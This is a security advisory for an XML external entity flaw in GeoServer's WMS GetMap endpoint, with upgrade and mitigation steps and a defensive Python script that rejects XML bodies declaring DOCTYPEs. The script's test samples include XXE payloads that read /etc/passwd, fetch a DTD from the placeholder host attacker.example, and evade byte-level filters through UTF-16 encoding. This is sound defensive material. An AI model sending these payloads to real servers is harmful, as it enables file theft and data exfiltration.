GeoServer XML External Entity (XXE) Vulnerability

HIGH (8.2) Workaround Available

Threat Intelligence

High Risk - Exploits exist
EPSS Score: 71.92% chance of exploitation (percentile: 99%)
🔍 Detection Tools: OSV.dev, Nuclei
⚔️ Exploit Availability: GitHub PoC, CISA KEV


What is it?

GeoServer is an open-source geospatial data server that lets users publish and edit geospatial data over OGC services such as WMS. The WMS GetMap operation accepts requests as XML POST bodies, and in the affected releases the XML parser used for those bodies honoured document type declarations, so an attacker can define external entities inside the request. When the parser resolves them, a single crafted GetMap request can make the server read local files or open connections to internal or attacker-controlled hosts (SSRF, including out-of-band exfiltration of the file contents): the standard XXE outcomes. No authentication is needed beyond the ability to reach the WMS endpoint.

Am I affected?

You're affected if you run GeoServer 2.25.x earlier than 2.25.6 or 2.26.x earlier than 2.26.3 with the WMS service enabled (the default). The fixed releases are 2.25.6, 2.26.3 and 2.27.0. If you don't recognise this software, you're probably not affected.

Affected Packages

maven: org.geoserver.web:gs-web-app

Affected Products

Open Source Geospatial Foundation (OSGeo) / GeoServer

How to fix

Update to GeoServer 2.25.6, 2.26.3, or 2.27.0 (or any later release).
* Maven: bump the dependency org.geoserver.web:gs-web-app to 2.25.6 or later on the 2.25 line, 2.26.3 or later on the 2.26 line, and rebuild.
* Docker: pin the image to a patched tag, for example docker run -it --rm osgeo/geoserver:2.25.6, and rebuild any image of your own that bundles GeoServer instead of just restarting the container.
* Immediate mitigations until the update is deployed:
  * Restrict network access to your GeoServer instance (firewall it from the public internet; if WMS must stay reachable, put it behind authentication or an IP allowlist).
  * Reject XML POST requests to the WMS endpoint whose body contains a DOCTYPE declaration at the reverse proxy or WAF; legitimate GetMap bodies do not need one.
  * Restrict outbound connections from the GeoServer host. Egress filtering blocks out-of-band exfiltration through external DTDs and limits what an SSRF can reach.
  * Review access logs for XML POST requests to the WMS endpoint from unfamiliar sources, and treat any body carrying <!DOCTYPE or <!ENTITY as an exploitation attempt rather than as noise.
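As an added example (not part of this advisory and not GeoServer's code), the script below ties together the request shape described under "What is it?" and the pre-parse check that the reverse-proxy mitigation above depends on. It uses Python's standard-library expat bindings to reject any XML body that declares a DOCTYPE or an entity before the body reaches the application's parser, and contrasts that with a plain substring rule. All request bodies are constructed for the demonstration: the GetMap body is modelled on the WMS XML POST form, and the layer name, file path and attacker.example host are placeholders, not captured traffic.

```python
"""Pre-parse guard for XML POST bodies such as WMS GetMap requests.

Example code written for this page, not GeoServer's.  The check is built on
the stdlib expat bindings so that it follows XML prolog syntax instead of
grepping for substrings.  Sample bodies are constructed; the GetMap shape is
modelled on the WMS XML POST form and every host, layer and path is a placeholder.
"""
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """Raised as soon as the body declares a DOCTYPE or an entity."""


def check_xml_body(body: bytes) -> None:
    """Raise DoctypeRejected on the first DOCTYPE or ENTITY declaration.

    Malformed XML raises expat.ExpatError; a front end should treat that as a
    rejection too rather than forward the body to the application parser.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} (system id {sysid!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter entity" if is_param else "entity"
        raise DoctypeRejected(f"{kind} {name!r} -> {sysid or value!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(body, True)  # exceptions raised in handlers propagate out of Parse


def verdict(body: bytes) -> tuple:
    """Return ("accept", "") or ("reject", reason) for one request body."""
    try:
        check_xml_body(body)
    except DoctypeRejected as exc:
        return ("reject", str(exc))
    except expat.ExpatError as exc:
        return ("reject", f"malformed XML: {exc}")
    return ("accept", "")


def naive_scan(body: bytes) -> bool:
    """Byte-level substring rule, as a proxy regex might do it; kept for contrast."""
    upper = body.upper()
    return b"<!DOCTYPE" in upper or b"<!ENTITY" in upper


# Constructed sample bodies (not captured traffic).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows" xmlns:gml="http://www.opengis.net/gml"
            version="1.1.1" service="WMS">
  <StyledLayerDescriptor version="1.0.0">
    <NamedLayer><Name>example:layer</Name><NamedStyle><Name>default</Name></NamedStyle></NamedLayer>
  </StyledLayerDescriptor>
  <BoundingBox srsName="EPSG:4326">
    <gml:coord><gml:X>-130</gml:X><gml:Y>24</gml:Y></gml:coord>
    <gml:coord><gml:X>-55</gml:X><gml:Y>50</gml:Y></gml:coord>
  </BoundingBox>
  <Output><Format>image/png</Format><Size><Width>550</Width><Height>250</Height></Size></Output>
</ogc:GetMap>
"""

# In-band XXE: the entity expands wherever the application reflects that element.
XXE_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE GetMap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows" version="1.1.1" service="WMS">
  <StyledLayerDescriptor version="1.0.0"><NamedLayer><Name>&xxe;</Name></NamedLayer></StyledLayerDescriptor>
</ogc:GetMap>
"""

# Blind / out-of-band variant: a parameter entity fetches a DTD from an
# attacker-controlled host (placeholder), which is what egress filtering stops.
XXE_OOB = b"""<?xml version="1.0"?>
<!DOCTYPE GetMap [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>
<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows" version="1.1.1" service="WMS"/>
"""

# Same payload as UTF-16 with a byte-order mark: a byte-level substring rule
# never sees the ASCII string "<!DOCTYPE", while a real parser still does.
XXE_UTF16 = ('<!DOCTYPE GetMap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             '<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows">&xxe;</ogc:GetMap>').encode("utf-16")

# A comment that merely mentions DOCTYPE is harmless XML: the substring rule
# blocks it (false positive), the parser-based check accepts it.
COMMENT_DECOY = b"""<?xml version="1.0"?>
<!-- <!DOCTYPE note> -->
<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows" version="1.1.1" service="WMS"/>
"""

SAMPLES = {"benign": BENIGN, "xxe_file": XXE_FILE, "xxe_oob": XXE_OOB,
           "xxe_utf16": XXE_UTF16, "comment_decoy": COMMENT_DECOY}


def triage(samples: dict = SAMPLES) -> dict:
    """Run both checks over every body: {label: (decision, reason, naive_flag)}."""
    return {label: (*verdict(body), naive_scan(body)) for label, body in samples.items()}


if __name__ == "__main__":
    for label, (decision, reason, naive) in triage().items():
        print(f"{label:14} {decision:7} naive_flag={naive!s:5} {reason}")
```

Anything the guard rejects should be logged with the source address and dropped, not forwarded, since the two encodings of the same payload show why a byte-level rule alone is not enough. The filter only protects traffic that passes through it; updating GeoServer remains the fix.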